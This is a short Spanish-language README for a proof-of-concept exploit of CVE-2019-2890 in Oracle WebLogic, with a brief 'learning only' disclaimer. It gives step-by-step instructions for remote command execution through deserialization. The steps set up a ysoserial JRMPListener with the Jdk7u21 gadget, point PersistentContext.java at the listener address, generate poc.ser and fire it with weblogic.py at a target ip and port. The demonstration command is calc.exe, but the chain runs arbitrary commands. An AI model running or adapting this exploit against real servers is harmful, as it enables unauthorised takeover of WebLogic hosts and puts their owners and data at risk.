
Exploit PoC para CVE-2019-2890 dirigido a Oracle WebLogic, usando payload JRMP de ysoserial para ejecución remota de comandos mediante deserialización de objetos serializados.
Solo para fines de aprendizaje e intercambio; cualquier otro uso es bajo su propia responsabilidad.
Los archivos jar relevantes ya se han importado al proyecto y el método de explotación utiliza el JRMP de yso; durante el aprendizaje y la depuración, puedes modificar el método de explotación.
Primero, coloca el archivo SerializedSystemIni.dat de weblogic en la carpeta security.
Luego, renombra yso a ysoserial.jar e impórtalo en el directorio lib.

A continuación, la dirección IP y el puerto de getObject en weblogic/wsee/jaxws/persistence/PersistentContext.java.
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
Finalmente, de forma remota a través de la escucha JRMP, utiliza 7u21 para ejecutar comandos.
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
Método de uso: ejecuta Poc.java para generar el archivo serializado poc.ser y luego:
python weblogic.py ip port poc.ser

